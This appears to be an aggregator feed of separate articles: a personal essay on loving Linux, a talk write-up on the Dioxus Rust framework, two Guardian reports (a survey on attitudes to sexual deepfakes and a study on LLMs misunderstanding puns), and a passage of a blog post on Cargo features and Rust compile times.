And the distributions, especially the more "arduous" ones to install, taught me a lot. The distro-hopping of the early 2000s made me truly understand partitioning, the boot procedure (Lilo first, then Grub, etc.), and for this, I must mainly thank Gentoo and Arch (and the FreeBSD handbook - but this is for another article). I learned the importance of backups the hard way, and I keep this lesson well in mind today. My Linux desktops ran mainly with Debian (initially), then Gentoo, Arch, and openSUSE (which, at the time, was still called "SUSE Linux"), Manjaro, etc. My old 486sx 25Mhz with 4MB (yes, MB) of RAM, powered by Debian, allowed me to download emails (mutt and fetchmail), news (inn + suck), program in C, and create shell scripts - at the end of the 90s.

When Linux Conquered the World

Then the first Ubuntu was launched, and many things changed. I don't know if it was thanks to Ubuntu or simply because the time was ripe, but attention shifted to Linux on the desktop as well (albeit mainly on the computers of us enthusiasts), and many companies began to contribute actively to the system or distributions.

I am not against the participation of large companies in Open Source. Their contributions can be valuable for the development of Open Source itself, and if companies make money from it, good for them. If this ultimately leads to a more complete and valid Open Source product, then I welcome it! It is precisely thanks to mass adoption that Linux cleared the path for the acceptance of Open Source at all levels. I still remember when, just after graduating, I was told that Linux (and Open Source systems like the BSDs) were "toys for universities". I dare anyone to say that today!

But this must be done correctly: without spoiling the original idea of the project and without hijacking (voluntarily or not) development toward a different model. Toward a different evolution. The use of Open Source must not become a vehicle for a business model that tends to close, trap, or cage the user. Or harm anyone. And if it is oriented toward worsening the product solely for one's own gain, I can only be against it.

What Changed Along the Way

And this is where, unfortunately, I believe things have changed in the Linux world (if not in the kernel itself, at least in many distributions). Innovation used to be disruptive out of necessity. Today, in many cases, disruption happens without purpose, and stability is often sacrificed for changes that do not solve real problems. Sometimes, in the name of improved security or stability, a new, immature, and unstable product is created - effectively worsening the status quo.

To give an example, I am not against systemd on principle, but I consider it a tool distant from the original Unix principles - do one thing and do it well - full of features and functions that, frankly, I often do not need. I don't want systemd managing my containerization. For restarting stopped services? There are monit and supervisor - efficient, effective, and optional. And, I might add: services shouldn't crash; they should handle problems in a non-destructive way. My Raspberry Pi A+ doesn't need systemd, which occupies a huge amount of RAM (and precious clock cycles) for features that will never be useful or necessary on that platform.

But "move fast and break things" has arrived everywhere, and software is often written by gluing together unstable libraries or those laden with system vulnerabilities. Not to mention so-called "vibe coding" - which might give acceptable results at certain levels, but should not be used when security and confidentiality become primary necessities or, at least, without an understanding of what has been written.

We are losing much of the Unix philosophy, and many Linux distributions are now taking the path of distancing themselves from a concept of cross-compatibility ("if it works on Linux, I don't care about other operating systems"), of minimalism, of "do one thing and do it well". And, in my opinion, we are therefore losing many of the hallmarks that have distinguished its behavior over the years.

In my view, this depends on two factors: a development model linked to a concept of "disposable" electronics, applied even to software, and the pressure from some companies to push development where they want, not where the project should go. Therefore, in certain cases, the GPL becomes a double-edged sword: on one hand, it protects the software and ensures that contributions remain available. On the other, it risks creating a situation where the most "influential" player can totally direct development because - unable to close their product - they have an interest in the entire project going in the direction they have predisposed. In these cases, perhaps, BSD licenses actually protect the software itself more effectively. Because companies can take and use without an obligation to contribute. If they do, it is because they want to, as in the virtuous case of Netflix with FreeBSD. And this, while it may remove (sometimes precious) contributions to the operating system, guarantees that the steering wheel remains firmly in the hands of those in charge - whether foundations, groups, or individuals.

And Why I Still Care

And so yes, despite all this, I (still) love Linux.

Because it was the first Open Source project I truly believed in (and which truly succeeded), because it works, and because the entire world has developed around it. Because it is a platform on which tons of distributions have been built (and some, like Alpine Linux, still maintain that sense of minimalism that I consider correct for an operating system). Because it has distributions like openSUSE (and many others) that work immediately and without problems on my laptop (suspension and hibernation included) and on my miniPC, a fantastic tool I use daily. Because hardware support has improved immensely, and it is now rare to find incompatible hardware.

Because it has been my life companion for 30 years and has contributed significantly to putting food on the table and letting me sleep soundly. Because it allowed me to study without spending insane amounts on licenses or manuals. Because it taught me, first, to think outside the box. To be free.

So thank you, GNU/Linux.

Even if your btrfs, after almost 18 years, still eats data in spectacular fashion. Even if you rename my network interfaces after a reboot. Even though, at times, I get the feeling that you’re slowly turning into what you once wanted to defeat.

Even if you are not my first choice for many workloads, I foresee spending a lot of time with you for at least the next 30 years.

Does Dioxus spark joy?

Lobsters
fasterthanli.me
2025-11-24 09:24:08
Comments...
Original Article
Amos

Note: this article is adapted from a presentation I gave at a Rust Paris Meetup — that’s why it sounds a little different than usual. Enjoy!

Good evening! Tonight, I will attempt to answer the question: Does Dioxus spark joy? Or at the very least, whimsy.

What’s Dioxus, you ask? It is first and foremost a name that is quote: “legally not inspired by any Pokémon”.

The deoxys pokemon

Even if the author concedes in a Hacker News comment that the “Deoxys” Pokémon is, I quote: “awesome”.

To cover any upcoming legal fees just in case Nintendo doesn’t buy that origin story, Dioxus is, as of the summer of 2023, a YCombinator startup.

The YC page for dioxuslabs, active since summer 2023, team size 4, founder Jonathan Kelley.

Regulars might be wondering at this point, what does any of that have to do with Rust? Well, don’t worry, I have gone and checked for you: Dioxus is , in fact, getting money from Huawei, which makes it a Rust project just like any other.

Screenshot of the YC page where it says Dioxus Labs gets Huawei money.

Please find on this diagram, in red, every Rust project funded by Huawei, or any other kind of -wei.

Huawei funding diagram — the XKCD meme where everything relies on the work of one person, except it's colored in red mostly.

Dioxus is the promise of having a single code base for your mobile apps and web apps and desktop apps. It makes me think of React Native or PhoneGap. If you’ve heard of PhoneGap , remember to stretch. It’s very important at our ages.

Dioxus “fullstack” goes one step further, with a single code base for the client and for the server. But what does that mean? How did we get here? Let’s go back in time for a minute or twelve.

A short and mostly wrong history of web apps

There’s been plenty of different paradigms when it comes to web apps, and I won’t cover them all.

In short, in the first generation, “generating HTML” is the job of the server. You are allowed to sprinkle some JavaScript (or, god forbid, Visual Basic Script) to make some stuff move, but that’s as far as it goes.

The image is a diagram illustrating the relationship between a server and a client in web rendering.
	•	The left half is blue and labeled SERVER, containing an oval labeled “render.”
	•	The right half is white and labeled CLIENT, containing an oval labeled “display.”
	•	Between them, a box labeled HTML sits in the center, with an arrow from “render” to “HTML” and another arrow from “HTML” to “display.”
	•	The diagram shows that the server renders HTML, which is then sent to and displayed by the client.
	•	There is also a small orange crab illustration in the top-right corner.

Note that I’m saying “render” in that diagram for “generating HTML”, with my apologies to people who work on Servo and Skia and whatnot. I’m just reusing the React nomenclature, sowwy.

In the second generation of web apps, the world has now written a critical mass of JavaScript. We’re starting to have something that resembles DevTools. If you remember Firebug , that was among the first. And maybe you should work on a will or something like that.

The image is a diagram showing the relationship between a server and a client in a web application using data exchange formats.
	•	The left half is blue and labeled SERVER, containing an oval labeled “databases and co.”
	•	The right half is white and labeled CLIENT, containing two stacked ovals labeled “render” and “display,” connected by a downward arrow.
	•	In the center, a box labeled XML or JSON ou whatever connects the server and client with arrows pointing from left to right.
	•	The diagram illustrates that the server provides data (e.g., XML or JSON), and the client renders and displays it.
	•	There is also a small orange crab illustration in the top-right corner.

We’re starting to get comfortable with the idea of a real application living inside of the web browser, which renders HTML based on structured data coming from the server. And then follows a decade of developers using something called “XMLHttpRequest” to send JSON around. Oh well.

We’re starting to have web apps that work offline. However, the initial loading experience is bad. Visitors have to wait for the entire app to load, then they wait for the app to do its API calls, and then for the app to render the HTML, which can take a long time: planet earth is starting to develop a collective distaste for the spinner.

And that’s not the only problem we’ll have to address for SPAs (single-page apps). We’ll have accessibility, navigation history, search engine optimization, and of course, data loading. If every component on a page does its own API request to get some data and then render, that’s a lot of requests per page.

Especially if you looked at React the wrong way and your component is doing API calls in an infinite loop, then it’s a lot, a lot, a lot of API calls. And yes, that is actually what took Cloudflare down recently.

The image is a diagram showing how server-side rendering with client-side hydration works.
	•	The left half is blue and labeled SERVER, containing an oval labeled “render.”
	•	The right half is white and labeled CLIENT, containing two stacked ovals labeled “display” and “hydration,” connected by a downward arrow.
	•	In the center, a box labeled HTML + JSON hidden somewhere connects the server and client with arrows pointing from left to right.
	•	The diagram represents a process where the server renders HTML along with embedded JSON data, which the client uses to display the page and then hydrate it for interactivity.
	•	A small orange crab illustration appears in the top-right corner.

So boom, third generation, full stack, best of both worlds. We do the render on the server like before, and we stream it to the client, which can display it as it’s being received. But alongside that rendered HTML, the server also sends the structured data that it used to render the HTML.

A practical example

Here’s a practical example. It’s a counter written in Dioxus:

#[component]
fn Counter() -> Element {
    let mut x = use_signal(|| 0_u64);
    let inc = move |_| x += 1;
    let dec = move |_| x -= 1;

    rsx! {
        "{x}"
        button { onclick: inc, "+" }
        button { onclick: dec, "-" }
    }
}

When we do the server-side rendering, we just say, okay, there is a variable x that starts at zero. It’s used in the macro RSX, and then there’s two buttons.

The two buttons do something if you click on them, but can we do something about it on the server side? No, those event handlers have to be registered on the client side. All we can do is send hints.

Here’s the HTML markup sent by the server:

<!--node-id0 -->0<!--#-->
<button data-node-hydration="1,click:1">+</button>
<button data-node-hydration="2,click:1">-</button>

There’s no onclick attribute on the button tags directly. There’s only information that references the structured data (that I’m not showing you here to avoid a wall of text).

So the client has the same data the server had. It’s doing the same render as the server did and then it creates a mapping between what the server sent and what the client rendered. Then it takes over the document, installing event handlers, making everything interactive, a process we call hydration.

Now the whole point of having the server stream markup is that we can show it early before the app is even loaded on the client. But what happens if we click on a button in the middle of the hydration process?

In theory, the server markup could include actual links or forms that would trigger regular browser actions. But in practice, it’s been a while since I’ve seen anybody bother doing that.

Now, what happens if during hydration the client render doesn’t match the server render? Then it can’t create a mapping and everything’s broken. I think the best case you can do here is just replace everything with the version that the client rendered, which is still pretty bad as everything would jump around.

And now what if we need data that takes some time to fetch? For example, we’re fetching from a database or an API. That’s a family of problems that the industry has been trying to solve for years. And Dioxus offers several solutions in the form of hooks:

  • try_use_context
  • use_after_suspense_resolved
  • use_callback
  • use_context
  • use_context_provider
  • use_coroutine
  • use_coroutine_handle
  • use_effect
  • use_future
  • use_hook
  • use_hook_did_run
  • use_hook_with_cleanup
  • use_route
  • use_router
  • use_navigator
  • use_memo
  • use_on_unmount
  • use_reactive
  • use_resource
  • use_root_context
  • use_set_compare
  • use_set_compare_equal
  • use_signal
  • use_signal_sync
  • use_reactive!
  • use_server_future
  • use_server_cached
  • use_drop
  • use_before_render
  • use_after_render

So there’s a little something for everyone. There’s synchronous hooks. There’s asynchronous hooks. There’s reactive hooks. There’s hooks that cache the results. There are hooks that only run on the server side or only on the client side.

It’s a little bit intimidating, to be honest. We’re far from the “if it compiles it works” that I got used to, in Rust?

If you break the rules of hooks, you don’t get a build error or even a runtime error. You just get a weird behavior, which can be hard to debug.

But there’s kind of a good reason for that.

It’s that full stack stuff is complicated. It truly is. It’s not that Dioxus added complexity where we didn’t need any. It’s that this is a problem that’s inherently complex.

Love-hate

Now… I have a confession to make.

I was originally planning to be a little rough on Dioxus because I challenged myself to use it to build the quizzing software that I used at Eurorust in Paris . And that was honestly a pretty frustrating experience.

But as I dug deeper, I realized that most of my complaints were really just misunderstandings, or already in the process of being fixed in the main branch, or simply limitations of the current WebAssembly/Rust ecosystem.

I was going to start with praising the developer experience of Dioxus with their dx tool, which wraps cargo and takes care of compiling WebAssembly. I was going to praise the loading screen you see in the browser while it’s compiling everything…

What dx serve looks like

But then I was going to complain about the fact that if there’s a panic in the app, it just becomes unresponsive! There is nothing that shows you that something went wrong and the entire app is broken!

Well, in the main branch, there is! Of course they added it! It makes sense, and they are smart people using their own stuff.

Next, I was going to complain that the stack traces are completely useless because all we see are function names with numbers and hexadecimal offsets into a big WASM file.

A stacktrace where every function name is $func

But since then, I’ve found this Chrome extension called C/C++ DevTools Support (DWARF) , which looks exactly like what someone would come up with if they were trying to target me specifically with malware.

The C/C++ DevTools Support chrome extension page

And yet it works, it doesn’t actually give us the name of the functions but it does show the name of source files and lines. And if you click them they open up in DevTools, and you can place breakpoints, you can step in, step over, step out like a real debugger.

The stack traces now have rust source names and line numbers.

It’s honestly a lot better than I imagined. I didn’t even know we were so far with WASM debugging or that we had picked DWARF for that but I guess that makes sense.

The debugging experience in dev tools.

Next, I was going to complain about Subsecond, their hot patching thing.

So, what is hot patching? When you develop a web application, it’s kind of a given now, because of React and Svelte and whatnot, that you should be able to modify the source code of a component and, when saving that file in your editor, have the change apply directly in your browser without changing the state of the application.

So if you’ve navigated deep into your application’s hierarchy, hot patching doesn’t reload you back to the start page. It doesn’t reload the page at all. Instead, it updates only the components that have changed on the current page.

And I thought I was using that with Dioxus and I thought, wow, it doesn’t really work well at all. It actually does lose state and it’s not actually under a second. It turns out I hadn’t enabled it. I forgot. You have to pass --hot-patch and I… didn’t know.

When I did enable it, I noticed that it worked really well. Like, well, it crashes all the time, because what it’s doing is a lot more complicated than what the JavaScript frameworks do, and it’s still early days. But the promise is here. You can make a change and see the result very quickly in your browser.

And you wanna know something funny? When you enable hot patching, stack traces show the actual mangled names of Rust functions. But it also breaks DWARF debugging, so uhhh.. your choice I guess.

Does Dioxus spark joy?

It’s time to answer the question, does Dioxus spark joy? I’m gonna say: not yet.

For now, without subsecond and everything, it’s still really unpleasant for the most part, compared to Svelte 5 which is my gold standard. But I can see what the Dioxus team is going for and I’m really excited for it.

I was kind of skeptical going into this. I was like: I’m gonna get Rust enums, which is great, but everything else is going to suck .

But I was wrong! The generational references make event handlers not actually miserable to write. Server-side functions with web sockets actually work pretty well. And get rid of a lot of boilerplate.

The Dioxus team is doing a lot of hard, interesting work. They have a Flexbox implementation that they’re sharing with Servo. They’re doing their own HTML and CSS renderer now to make desktop applications without a full-fledged web engine.

I’m very much looking forward for Dioxus and the entire WASM on the front-end ecosystem to catch up with the JavaScript-based solutions in terms of developer ergonomics.

In the meantime, I’ll be doing Rust on the backend, and TypeScript on the frontend.

Afterword

So since I gave this talk, I’ve written several thousand lines of dioxus for an upcoming project, which… made the conclusion a lie I guess. I still feel conflicted about it, but I guess I’m also invested in it now. Let’s… see where this goes!


Did you know I also make videos? Check them out on PeerTube and also YouTube !


One in four unconcerned by sexual deepfakes created without consent, survey finds

Guardian
www.theguardian.com
2025-11-24 09:00:32
Senior UK police officer says AI is accelerating violence against women and girls and that technology companies are complicit One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, ac...
Original Article

One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, according to a police-commissioned survey.

The findings prompted a senior police officer to warn that the use of AI is accelerating an epidemic in violence against women and girls (VAWG), and that technology companies are complicit in this abuse.

The survey of 1,700 people commissioned by the office of the police chief scientific adviser found 13% felt there was nothing wrong with creating and sharing sexual or intimate deepfakes – digitally altered content made using AI without consent.

A further 12% felt neutral about the moral and legal acceptability of making and sharing such deepfakes.

Det Ch Supt Claire Hammond, from the national centre for VAWG and public protection, reminded the public that “sharing intimate images of someone without their consent, whether they are real images or not, is deeply violating”.

Commenting on the survey findings, she said: “The rise of AI technology is accelerating the epidemic of violence against women and girls across the world. Technology companies are complicit in this abuse and have made creating and sharing abusive material as simple as clicking a button, and they have to act now to stop it.”

She urged victims of deepfakes to report any images to the police. Hammond said: “This is a serious crime, and we will support you. No one should suffer in silence or shame.”

Creating non-consensual sexually explicit deepfakes is a criminal offence under the new Data Act.

The report, by the crime and justice consultancy Crest Advisory, found that 7% of respondents had been depicted in a sexual or intimate deepfake. Of these, only 51% had reported it to the police. Among those who told no one, the most commonly cited reasons were embarrassment and uncertainty that the offence would be treated seriously.

The data also suggested that men under 45 were likely to find it acceptable to create and share deepfakes. This group was also more likely to view pornography online and agree with misogynistic views, and feel positively towards AI. But the report said this association of age and gender with such views was weak and it called for further research to explore this apparent association.

One in 20 of the respondents admitted they had created deepfakes in the past. More than one in 10 said they would create one in the future. And two-thirds of respondents said they had seen, or might have seen, a deepfake.

The report’s author, Callyane Desroches, head of policy and strategy at Crest Advisory, warned that the creation of deepfakes was “becoming increasingly normalised as the technology to make them becomes cheaper and more accessible”.

She added: “While some deepfake content may seem harmless, the vast majority of video content is sexualised – and women are overwhelmingly the targets.

“We are deeply concerned about what our research has highlighted – that there is a cohort of young men who actively watch pornography and hold views that align with misogyny who see no harm in viewing, creating and sharing sexual deepfakes of people without their consent.”

Cally Jane Beech, an activist who campaigns for better protection for victims of deepfake abuse, said: “We live in very worrying times, the futures of our daughters (and sons) are at stake if we don’t start to take decisive action in the digital space soon.”

She added: “We are looking at a whole generation of kids who grew up with no safeguards, laws or rules in place about this, and are now seeing the dark ripple effect of that freedom.

“Stopping this starts at home. Education and open conversation need to be reinforced every day if we ever stand a chance of stamping this out.”

Can’t tech a joke: AI does not understand puns, study finds

Guardian
www.theguardian.com
2025-11-24 07:59:34
Researchers say results underline large language models’ poor grasp of humour, empathy and cultural nuance Comedians who rely on clever wordplay and writers of witty headlines can rest a little easier, for the moment at least, research on AI suggests. Experts from universities in the UK and Italy ha...
Original Article

Comedians who rely on clever wordplay and writers of witty headlines can rest a little easier, for the moment at least, research on AI suggests.

Experts from universities in the UK and Italy have been investigating whether large language models (LLMs) understand puns – and found them wanting.

The team from Cardiff University , in south Wales, and Ca’ Foscari University of Venice concluded that LLMs were able to spot the structure of a pun but did not really get the joke.

An example they tested was: “I used to be a comedian, but my life became a joke.” If they replaced this with: “I used to be a comedian, but my life became chaotic,” LLMs still tended to perceive the presence of a pun.

They also tried: “Long fairy tales have a tendency to dragon.” If they replaced “dragon” with the synonym “prolong” or even a random word, LLMs seemed to believe there was a pun there.

Prof Jose Camacho Collados , of Cardiff University’s school of computer science and informatics, claimed the research suggested LLMs’ grasp of humour was fragile.

“In general, LLMs tend to memorise what they have learned in their training. As such, they catch existing puns well but that doesn’t mean they truly understand them,” he said.

“We were able to consistently fool LLMs by modifying existing puns, removing the double meaning that made the original pun. In these cases, models associate these sentences with previous puns, and make up all sort of reasons to justify they are a pun. Ultimately, we found their understanding of puns is an illusion.”

The team concluded that when faced with unfamiliar wordplay, the LLMs’ success rate in distinguishing puns from sentences without a pun can drop to 20%.

Another pun tested was: “Old LLMs never die, they just lose their attention.” When attention was changed to “ukulele”, the LLM still perceived it as a pun on the basis that “ukulele” sounded a bit like “you-kill-LLM”.

The team was surprised at the creativity, but still, the LLM had not got the joke.

The researchers said the work underlined why people should be cautious when using LLMs for applications that need an understanding of humour, empathy or cultural nuance.

Their research was presented earlier this month at the 2025 Conference on Empirical Methods in Natural Language Processing, in Suzhou, China. It is detailed in a paper titled Pun unintended: LLMs and the illusion of humor understanding .

Making the case that Cargo features could be improved to alleviate Rust compile times

Lobsters
saghm.com
2025-11-24 07:22:38
Comments...
Original Article

Two common criticisms of Rust development are the long compile times and the large number of dependencies that end up being used in projects. While people have drawn connections between these issues before, I've noticed that most discussions don't end up talking much about a specific tool that ostensibly should help mitigate this issue: Cargo features. For those not already familiar with Cargo features, I'd recommend the Rust book as an authoritative source of documentation for how they work; for those not interested in having to read something external to understand the rest of this post, here's a brief summary of how they work:

  • When creating a Rust package...
    • you can define any number of "features"
    • a feature can be tied to one or more "optional" dependencies, which will get included if the feature is enabled by downstream users and will not be included if disabled by downstream users
    • a feature can depend on other features (either from within the same package or its dependencies), which will transitively include them whenever the feature that required them is enabled
    • code inside the package can be conditionally included or excluded based on whether certain features are enabled or disabled
    • the package defines which subset of the features are enabled by default
  • When depending on a Rust package that uses features...
    • without specifying any additional details, the default set of features defined by the package will be used
    • individual features can be enabled by manually listing them in the details of a dependency configuration
    • default features can be disabled completely for a given dependency, meaning that only the individually listed features will be enabled
    • a dependency that is specified more than once (either transitively by multiple direct dependencies or both directly and transitively) using versions that are considered compatible in terms of SemVer will be "unified", which means the union of sets of specified features will be enabled
      • In case this is confusing, here's a concrete example: imagine a package called D has features called foo , bar , and baz . Package A depends directly on version 1.1.1 of D and specifies it uses the features foo and bar from it. A also depends directly on packages B and C . B depends directly on version 1.2.0 of D and uses the feature baz . Finally, C depends on version 1.5.0 of package D but doesn't specify any features. When compiling package A and its dependencies, package D will have features foo , bar , and baz enabled for all of A , B , and C

At a high level, Cargo features give package authors a way to allow users to opt into or out of parts of their package, and in an ideal world, they would make it easy to avoid having to compile code from dependencies that you don't need. For those familiar with other languages that provide similar functionality, this might be recognizable as a form of conditional compilation. It's worth noting that one of the common uses of feature flags is giving users the ability to opt out of code that uses procedural macros, which often have an outsized impact on compile times. However, there are some quirks in the way features work that, at least to me, seem to get in the way of this happening in practice, and I've increasingly started to feel like they're a key piece of why the Rust ecosystem hasn't been able to improve the situation around compilation times and dependency bloat significantly.
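Before moving on, here is roughly what the feature-unification example from the list above looks like in manifest form. This is only an illustrative sketch (only the relevant [dependencies] sections are shown), and the package names a, b, c, d and the features foo, bar, and baz are the hypothetical ones from that example, not real crates.

# a/Cargo.toml

[dependencies]
b = { path = "../b" }
c = { path = "../c" }
d = { version = "1.1.1", features = ["foo", "bar"] }

# b/Cargo.toml

[dependencies]
d = { version = "1.2.0", features = ["baz"] }

# c/Cargo.toml

[dependencies]
d = { version = "1.5.0" }

Because all three version requirements are SemVer-compatible, Cargo resolves a single copy of d and enables the union of the requested features, so d gets built with foo, bar, and baz for all of a, b, and c.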

Problems with "default-features"

In my opinion, the ergonomics around defining and using the default set of features get in the way of trying to reduce bloat and compile times. For example, by default, cargo doesn't show anything about what features are enabled in a dependency you've added. Here's an extremely contrived demonstration of how this might end up happening in a package I've defined locally:

# my-package/Cargo.toml

[package]
name = "my-package"
version = "0.1.0"
edition = "2021"

[dependencies]
my-dependency = { path = "../my-dependency" }

It imports another package that I've defined locally alongside it as a dependency. Currently, there's absolutely no code in this package other than the dependency:

# my-package/src/main.rs

fn main() {
}

Let's compile it!

$ time cargo build
  Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
  Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
  Finished `dev` profile [unoptimized + debuginfo] target(s) in 3.10s

real    0m3.155s
user    0m1.929s
sys     0m1.281s

Hmm, over three seconds to build a seemingly empty package in debug mode. Let's take a look at my-dependency to see what's going on.

# my-dependency/Cargo.toml

[package]
name = "my-dependency"
version = "0.1.0"
edition = "2021"

[features]
default = ["foo"]
foo = []

[dependencies]

my-dependency has a feature called "foo". We definitely didn't make any explicit choice to include it in my-package , and the cargo build output didn't mention it at all, but it's still going to be included by default because it's in the default feature list. What does the feature do though?

# my-dependency/src/lib.rs

#[cfg(feature = "foo")]
pub static BYTES: &'static [u8] = include_bytes!("./big_file");

Whoops! Turns out someone defined a static array of 400,000 bytes of zeroes and exported it under the foo feature flag. What happens if we disable that feature in our original package?

diff --git a/Cargo.toml b/Cargo.toml
index 8e39c10..52bc348 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -4,4 +4,4 @@ version = "0.1.0"
 edition = "2021"

 [dependencies]
-my-dependency = { path = "../my-dependency" }
+my-dependency = { path = "../my-dependency", default-features = false }
$ cargo clean && time cargo build
     Removed 32 files, 1007.6MiB total
   Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
   Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.20s

real    0m0.255s
user    0m0.152s
sys     0m0.107s

A fifth or a quarter of a second, depending on if you ask cargo or time . Either way, much better!

This example is obviously very silly, but at a high level, there's nothing stopping something similar from happening with real-world code because there's no obvious feedback given when using default features from dependencies.

The fact that default features can only be opted out of entirely rather than disabled individually can also be mildly annoying. If a package exposes 10 default features and you want to disable only one of them, the only way to do this currently is to disable all default features and then manually enable the nine you want to keep. (As an aside, this also means that introducing new default features won't necessarily cause all packages that depend on the crate to get them by default; in the previous example, increasing the number of default features to 11 would cause the above strategy to disable both the feature it previously disabled and the newly added default feature. While this isn't necessarily a bad thing from the perspective of compile times, I'd still argue that this happening in a mostly hidden way to users who upgrade isn't ideal, and that this problem would be better avoided by having a more granular mechanism for disabling default features.)
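As a sketch of that workaround (the crate name big-crate and the features f1 through f10 are made up for illustration), dropping just the tenth default feature currently looks like this:

[dependencies]
big-crate = { version = "1", default-features = false, features = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9"] }

If a later release of big-crate adds an f11 to its default set, this declaration silently leaves f11 disabled as well, which is exactly the hidden behavior described above.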

Problems with transitive dependencies

It might sound like the issues with bloat from features would be mitigated by avoiding marking features as default, but there's an additional issue that would still prevent this from improving things very much. The only mechanism that currently exists for a library to expose the features of its dependencies transitively is to define its own features that each "map" to the features of its dependencies. Using the contrived example from above, my-package could define a feature that depends on the foo feature of my-dependency , and end-users of my-package could choose whether to include that feature or not. Without that, users of my-package will always end up with the exact set of my-dependency features that my-package specifies; either all users of my-package get the foo feature from my-dependency or none of them do. In other words, Cargo doesn't provide any way to configure the set of features included from transitive dependencies.
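For concreteness, here is a minimal sketch of what that "mapping" looks like in a manifest. The feature name dep-foo is arbitrary, but the "my-dependency/foo" syntax is the standard way for a feature to enable a feature of a dependency:

# my-package/Cargo.toml

[features]
# Re-export my-dependency's "foo" feature under a name of our own; downstream
# users opt in by enabling the "dep-foo" feature of my-package.
dep-foo = ["my-dependency/foo"]

[dependencies]
my-dependency = { path = "../my-dependency", default-features = false }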

Imagine if you've created a library that has five dependencies, and none of those have any dependencies of their own. Not too bad compared to a lot of Rust packages! In order to do their part to combat bloat and compile times, each of those libraries defines five optional features, with the idea that users of the package can avoid compiling the parts they don't need. If you don't necessarily need those features in your own library, but you happen to expose types from all five of those crates in your own API, you'd need to define twenty-five features in your own crate to give your users the option to avoid the bloat. The situation gets even worse when you consider transitive dependencies; if each of those five dependencies had even a single dependency of their own with two optional features, and they followed the same strategy of exposing these as well, you'd need to add another ten features to your package on top of the initial twenty-five, just to avoid forcing users of your own code to include code they don't need and that you haven't even written, in addition to any features you define for users to avoid unnecessary bloat from your own code!

This is why I don't think that cleaning up the way default features are specified would end up being sufficient to alleviate the current situation. Even if we had a magic wand that we could wave and "fix" every library in the ecosystem to define a bunch of features to disable arbitrary code (both from themselves and mapping to the features of their dependencies), the number of features that would need to be disabled transitively to actually eliminate all of the unnecessary code would be absolutely massive. To me, this is a fundamental flaw in what otherwise could be an effective way to reduce compile times in Rust without having to drastically change the way people use dependencies today.

What might help with these issues?

I think there are a number of possible changes that could be made that would mitigate or potentially even eliminate the issues I've described here. Some of the ideas I have would probably cause incompatibilities with the way things currently work, and while there are some existing strategies that might make them less disruptive (like tying them to a bump in the feature resolver version ), I don't have enough expertise to know the exact details of how that would work. I'm also not entirely certain that the ideas I have would even be possible to implement, or that they would actually improve the compile times and bloat rather than make them worse due to consequences that haven't occurred to me. Given all of that, I'd characterize the remainder of this post as brainstorming rather than recommendations or even realistic suggestions. If the issues I've outlined above resonate with others who read this post, hopefully smarter people than me with far more domain expertise will come up with an effective way to deal with them.

With that said, these are some of the potential mitigations for these issues I've come up with, along with my extremely unscientific attempt to quantify how much I'd expect them to improve the situation, the amount of effort to implement them, and my confidence that my assessment of their impact is correct:

Providing a mechanism to manually disable individual default features when specifying a dependency

  • Low impact - This wouldn't drastically improve the status quo, but it would make trying to avoid bloat slightly easier in some situations
  • Low effort - I'd expect this to be mostly straightforward to implement
  • High confidence - The scope of this change is small enough that I don't think it's likely there are drastic unintended consequences that I haven't considered (although that doesn't necessarily mean that everyone would be happy with the consequences that are intended!)

Providing a less verbose way for libraries to expose the features of their direct dependencies to other packages that depend on them directly

  • Low impact - The direct impact of this change would essentially just be ergonomic, and it would only affect packages that reexport parts of their dependencies to their own users. If this included a way to disable transitive features that aren't needed, this could potentially make a large impact in the long run, but only if enough features ended up being exposed from libraries for people to disable enough code to make a difference
  • Medium effort - At minimum, this would require augmenting the Cargo manifest format to define a way to configure this, and I don't have enough expertise in the way the feature resolver works to feel safe in assuming that this would be possible without changes there as well
  • Medium confidence - I do think there's a small chance that this might not be feasible for some reason, but I also think there's a small chance that this change could have an outsized impact in alleviating the issues; eliminating the need to account for an exponential growth in feature count makes the "magic wand" to give us a world where all existing Rust APIs are sliced into bite-sized features much more enticing, so maybe we'll be lucky and giving the ecosystem enough incentive could cause people to start working towards making that hypothetical situation a reality

Providing a way to disable features from transitive dependencies

  • Low impact - This is essentially the same as the previous idea, only configured from the package inheriting features transitively rather than the one exposing them
  • Medium effort - I wouldn't be surprised if there was some additional work compared to the previous idea around handling conflicts when someone tries to disable a transitive feature that's required by the dependency they inherit it from, but this might not end up being hard to solve in practice
  • Low confidence - Overall, I think this would end up being a messier way to achieve the same results as the previous idea. However, there's some value in allowing people to fix bloat in their own packages without requiring changes from every dependency along the transitive chain, and it's possible that I'm underestimating the magnitude of that additional value

"Zero-config" features that allow enabling/disabling code in a library without the author having to manually define it

  • High impact - This would be the "magic wand" that I mentioned a few times above. The exact impact would depend on the granularity of the features it defines, but at the extreme end, automatically defining a separate feature for every individual item that gets exposed as part of a library's API could provide a way to avoid including any code that isn't used, like a compile-time version of the Unix strip utility
  • High effort - The amount of work needed to implement this would be substantial at pretty much every step of the process: designing how it should work, implementing the design, testing that it works correctly, and benchmarking the results on real-world codebases to validate that it actually helps
  • Low confidence - It's not clear to me whether this would be possible to do in a way that ended up being beneficial in practice

Of the ideas listed here, this is definitely the most radical, so I wouldn't be surprised if some people react strongly to it. However, it's the idea that I think would have the most potential to improve things, so I think it deserves some additional elaboration on my part.

The first objection I'd expect to hear to this idea would be feasibility; it might not be obvious whether this can even be done in practice. I do think there are at least two ways this could plausibly be implemented correctly: "one feature for every item in the crate" and "one feature for every module in the crate". At least from a computability perspective, it seems like it would be possible to enumerate each of these for a given library and define a corresponding feature, and then determine which (if any) of the others each of them depends on. Once that graph of feature dependencies is obtained, resolving the features that actually get used would presumably follow the same rules as resolving explicitly defined features.

